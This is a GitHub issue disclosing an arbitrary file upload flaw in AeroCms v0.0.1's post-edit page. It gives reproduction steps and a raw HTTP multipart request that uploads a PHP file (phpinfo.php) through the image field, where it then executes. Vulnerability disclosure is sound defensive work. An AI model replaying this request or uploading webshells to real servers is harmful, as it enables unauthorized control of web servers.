You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 8, 2023. It is now read-only.
In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.
Step to Reproduct
Login to admin panel -> Posts -> View All Posts -> Edit
when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php
When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed
Vulnerable Code
No file checking before uploading in edit_post.php file
In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.
Login to admin panel -> Posts -> View All Posts -> Edit
when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php
When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed
No file checking before uploading in edit_post.php file
`POST /AeroCMS/admin/posts.php?source=edit_post&p_id=3 HTTP/1.1
Host: 192.168.111.169
Content-Length: 991
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.111.169
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit_post&p_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45
Connection: close
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_title"
mysql
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_category_id"
1
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_user"
admin
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_status"
draft
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="image"; filename="phpinfo.php"
Content-Type: application/octet-stream
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_tags"
mysql, database
------WebKitFormBoundaryi7wHcLADqqvNM4nO
Content-Disposition: form-data; name="post_content"
AeroCMS is created with mysql database.
------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update_post"Edit Post
------WebKitFormBoundaryi7wHcLADqqvNM4nO--
`
The text was updated successfully, but these errors were encountered: